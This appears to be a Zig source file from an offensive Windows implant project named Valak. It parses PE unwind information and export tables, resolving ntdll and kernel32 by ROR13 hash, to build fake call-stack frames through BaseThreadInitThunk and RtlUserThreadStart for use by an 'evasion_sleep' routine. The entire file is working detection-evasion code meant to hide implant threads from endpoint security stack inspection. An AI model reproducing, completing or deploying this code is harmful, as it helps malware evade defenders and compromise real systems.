Files
Valak/evasion/frames.zig
T

182 lines
6.5 KiB
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// Synthetic callstack frames through kernel32!BaseThreadInitThunk and
// ntdll!RtlUserThreadStart. Parses .pdata unwind codes to compute per-function
// frame sizes, asm trampoline pushes frames with correct offsets.
const std = @import("std");
const resolve = @import("resolve.zig");
const syscall = @import("syscall.zig");
const pe = @import("pe.zig");
extern var qFakeRtlUserThreadStart: usize;
extern var qFakeBaseThreadInitThunk: usize;
extern var qRtlUserFrameSize: usize;
extern var qBaseThreadFrameSize: usize;
// x64 unwind opcodes from the PE/COFF spec.
const UWOP_PUSH_NONVOL: u8 = 0;
const UWOP_ALLOC_LARGE: u8 = 1;
const UWOP_ALLOC_SMALL: u8 = 2;
const UWOP_SET_FPREG: u8 = 3;
const UWOP_SAVE_NONVOL: u8 = 4;
const UWOP_SAVE_NONVOL_FAR: u8 = 5;
const UNW_FLAG_CHAININFO: u8 = 0x04;
const RBP_OP_INFO: u8 = 5;
// Compute total frame size from .pdata UNWIND_INFO.
fn calc_frame_size(mod_base: [*]const u8, unwind_rva: u32, out_size: *usize) bool {
const info = @as(*align(1) const extern struct {
VersionAndFlags: u8,
SizeOfProlog: u8,
CountOfCodes: u8,
FrameRegister: u8,
FrameOffset: u8,
UnwindCode: [1]u16,
}, @ptrCast(mod_base + unwind_rva));
var idx: usize = 0;
var sz: usize = 0;
var rbp_pushed: bool = false;
while (idx < info.CountOfCodes) : (idx += 1) {
const code = info.UnwindCode[idx];
const op: u8 = @truncate(code & 0xF);
const info_field: u8 = @truncate((code >> 4) & 0xF);
switch (op) {
UWOP_PUSH_NONVOL => {
if (info_field == 2 and !rbp_pushed) return false;
if (info_field == RBP_OP_INFO) rbp_pushed = true;
sz += 8;
},
UWOP_ALLOC_SMALL => sz += 8 * (@as(usize, info_field) + 1),
UWOP_ALLOC_LARGE => {
idx += 1;
var frame_offset: usize = info.UnwindCode[idx];
if (info_field == 0) {
frame_offset *= 8;
} else {
idx += 1;
frame_offset += @as(usize, info.UnwindCode[idx]) << 16;
}
sz += frame_offset;
},
UWOP_SET_FPREG => {
rbp_pushed = true;
const fp_off: isize = -0x10 * @as(isize, @intCast(info.FrameOffset));
sz = @as(usize, @intCast(@as(isize, @intCast(sz)) + fp_off));
},
UWOP_SAVE_NONVOL => {
if (info_field == RBP_OP_INFO or info_field == 2) return false;
idx += 1;
},
UWOP_SAVE_NONVOL_FAR => {
if (info_field == RBP_OP_INFO or info_field == 2) return false;
idx += 2;
},
else => {},
}
}
if ((info.VersionAndFlags & UNW_FLAG_CHAININFO) != 0) {
idx = info.CountOfCodes;
if ((idx & 1) != 0) idx += 1;
const chain_rva = @as(*align(1) const u32, @ptrCast(&info.UnwindCode[idx])).*;
var chain_sz: usize = 0;
_ = calc_frame_size(mod_base, chain_rva, &chain_sz);
sz += chain_sz;
}
out_size.* = sz + 8;
return true;
}
// Binary search .pdata exception directory for the RUNTIME_FUNCTION covering target_rva.
fn find_runtime_entry(target_rva: u32) ?struct { begin: u32, unwind: u32 } {
const exc_begin = syscall.g_exc_begin;
const exc_count = syscall.g_exc_count;
if (exc_begin == 0 or exc_count == 0) return null;
const funcs: [*]align(1) const syscall.RUNTIME_FUNCTION = @ptrFromInt(exc_begin);
var lo: usize = 0;
var hi: usize = exc_count;
while (lo < hi) {
const mid = lo + (hi - lo) / 2;
const entry = funcs[mid];
if (target_rva < entry.BeginAddress) {
hi = mid;
} else if (target_rva >= entry.EndAddress) {
lo = mid + 1;
} else {
return .{ .begin = entry.BeginAddress, .unwind = entry.UnwindInfoAddress };
}
}
return null;
}
// Find the RVA of a named export in a module.
fn export_rva(mod: [*]const u8, name: []const u8) ?u32 {
const dos: *align(1) const pe.IMAGE_DOS_HEADER = @ptrCast(@alignCast(mod));
if (dos.e_magic != 0x5A4D) return null;
const nt_hdrs: *align(1) const pe.IMAGE_NT_HEADERS64 = @ptrCast(@alignCast(
mod + @as(usize, @intCast(dos.e_lfanew)),
));
if (nt_hdrs.Signature != 0x00004550) return null;
const exp_dir = nt_hdrs.OptionalHeader.DataDirectory[0];
if (exp_dir.VirtualAddress == 0) return null;
const exp: *align(1) const pe.IMAGE_EXPORT_DIRECTORY = @ptrCast(@alignCast(
mod + @as(usize, @intCast(exp_dir.VirtualAddress)),
));
const names: [*]align(1) const u32 = @ptrCast(@alignCast(
@as([*]const u8, @ptrCast(mod)) + exp.AddressOfNames,
));
const funcs: [*]align(1) const u32 = @ptrCast(@alignCast(
@as([*]const u8, @ptrCast(mod)) + exp.AddressOfFunctions,
));
const ords: [*]align(1) const u16 = @ptrCast(@alignCast(
@as([*]const u8, @ptrCast(mod)) + exp.AddressOfNameOrdinals,
));
for (0..exp.NumberOfNames) |i| {
const n: [*:0]const u8 = @ptrCast(@alignCast(
@as([*]const u8, @ptrCast(mod)) + names[i],
));
if (std.mem.eql(u8, std.mem.sliceTo(n, 0), name)) {
if (ords[i] < exp.NumberOfFunctions) {
return funcs[ords[i]];
}
}
}
return null;
}
// Called once at DLL init. Results stored in asm globals used by evasion_sleep.
pub fn init_frames() void {
if (qFakeRtlUserThreadStart != 0) return;
const ntdll = resolve.get_module_by_hash(resolve.hash_ror13("ntdll.dll")) orelse return;
const k32 = resolve.get_module_by_hash(resolve.hash_ror13("kernel32.dll")) orelse return;
const ntdll_bytes: [*]const u8 = @ptrCast(ntdll);
const k32_bytes: [*]const u8 = @ptrCast(k32);
const btit_rva = export_rva(k32_bytes, "BaseThreadInitThunk") orelse return;
if (find_runtime_entry(btit_rva)) |entry| {
var fs: usize = 0;
if (calc_frame_size(k32_bytes, entry.unwind, &fs)) {
qFakeBaseThreadInitThunk = @intFromPtr(k32) + entry.begin;
qBaseThreadFrameSize = fs;
}
}
const rust_rva = export_rva(ntdll_bytes, "RtlUserThreadStart") orelse return;
if (find_runtime_entry(rust_rva)) |entry| {
var fs: usize = 0;
if (calc_frame_size(ntdll_bytes, entry.unwind, &fs)) {
qFakeRtlUserThreadStart = @intFromPtr(ntdll) + entry.begin;
qRtlUserFrameSize = fs;
}
}
}